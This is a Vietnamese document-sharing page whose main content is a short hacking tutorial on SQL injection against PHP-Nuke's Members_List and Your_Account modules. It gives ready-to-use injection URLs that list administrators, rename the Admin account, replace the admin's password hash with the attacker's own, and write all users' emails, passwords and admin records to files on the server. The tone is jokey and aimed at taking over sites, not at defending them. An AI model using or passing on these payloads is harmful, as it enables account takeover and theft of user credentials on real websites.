intTypePromotion=1
zunia.vn Tuyển sinh 2024 dành cho Gen-Z zunia.vn zunia.vn
ADSENSE
 » 
 » 

Hack PhpNuke, Khai thác lỗi trong modules Members List

Chia sẻ: Ai Dieu | Ngày: | Loại File: DOC | Số trang:1

Thêm vào BST
Báo xấu
91
lượt xem 18
download
 
  Download Vui lòng tải xuống để xem tài liệu đầy đủ

Trong Module Members_ListHiển thị tất cả thành viên được sắp xếp theo mật khẩu http:///modules.php?name=Members_List&letter=All&sortby=passHiển thị tất cả thành viên được sắp xếp theo UIDhttp:///modules.php?

Chủ đề:

Bình luận(0) Đăng nhập để gửi bình luận!

Lưu

Nội dung Text: Hack PhpNuke, Khai thác lỗi trong modules Members List

  1. Hack Php­Nuke, Khai thác lỗi trong modules Members List: trang này đã được đọc  lần  Khai thác lỗi trong module PHP­Nuke Lỗi trong module Members_List có thể lấy mật khẩu thành  viên và Admin. Cách khai thác như sau: Trong Module Members_List­ Hiển thị tất cả thành viên được sắp xếp theo mật khẩu http:///modules.php?name=Members_List&letter=All&sortby=pass­ Hiển thị tất cả thành  viên được sắp xếp theo UIDhttp:///modules.php? name=Members_List&letter=All&sortby=uid Hai câu truy vấn bên trên thì không có gì để để nói.  Híc híc. Bây giờ là câu truy vấn thứ ba­ Hiển thị tất cả Moderators http:///modules.php?name=Members_List&letter='%20OR%20user_level='2'/*­ Hiển thị tất cả  Administrator http:///modules.php?name=Members_List&letter='%20OR %20user_level='4'/*... *Khai thác Admin. Chuyển đổi tên "Admin" thành "seamoun" chẳng hạn. Khà khà http:///modules.php? name=Your_Account&op=savetheme&theme=',name='seamoun'%20where %20uname='Admin'/*&uid=[OUR_UID] Chuyển đổi mật khẩu của Admin (md5). Để có được mật khẩu md5 của mình các bạn có thể tự  tạo cho mình một mật khẩu sau đó view trong dữ liệu để lấy mã hoá md5. Khỏi mất công viết cho  mệt. Ở đây cái mật khẩu md5 của mình đã mã hoá rùi là b6d0de971824629e987b84d513dc8af0 http:///modules.php? name=Your_Account&op=saveuser&email=',pass='b6d0de971824629e987b84d513dc8af0'%20w here%20uname='Admin'/*&uid=[OUR_UID] Vậy là ta có thể Login với tên của mình và mật khẩu của mình tự tao ra. Hì hì Làm như trên thì mỗi lần ta chỉ làm cho một user thui. Vậy thì mệt quá, để lấy tất cả mật khẩu  cũng như mail lưu thành tệp email chẳng hạn. Câu lệnh như sau sẽ lưu thông tin của user http:///modules.php?name=Your_Account&op=mailpasswd&uname=') %20OR%201=1%20INTO%20OUTFILE%20'//email.txt'/* Sau khi thực hiện lệnh nó sẽ tạo ra một file trên host. để view file này thì đường dẫn nó là http:///email.txt ­ Lưu tất cả thông tin của Admin vào một tệp admin.txt http:///modules.php?name=Your_Account&op=login&uname='%20OR %user_level>1%20INTO%20OUTFILE%20'//admin.txt Đường dẫn để view trang này thì cũng như trên Tài liệu tham khảo: phpsecure       

CÓ THỂ BẠN MUỐN DOWNLOAD

THÔNG TIN
TRỢ GIÚP
HỖ TRỢ KHÁCH HÀNG
Theo dõi chúng tôi

Chịu trách nhiệm nội dung:

Nguyễn Công Hà - Giám đốc Công ty TNHH TÀI LIỆU TRỰC TUYẾN VI NA

LIÊN HỆ

Địa chỉ: P402, 54A Nơ Trang Long, Phường 14, Q.Bình Thạnh, TP.HCM

Hotline: 093 303 0098

Email: support@tailieu.vn

Giấy phép Mạng Xã Hội số: 670/GP-BTTTT cấp ngày 30/11/2015 Copyright © 2022-2032 TaiLieu.VN. All rights reserved.

 

Đồng bộ tài khoản
70=>1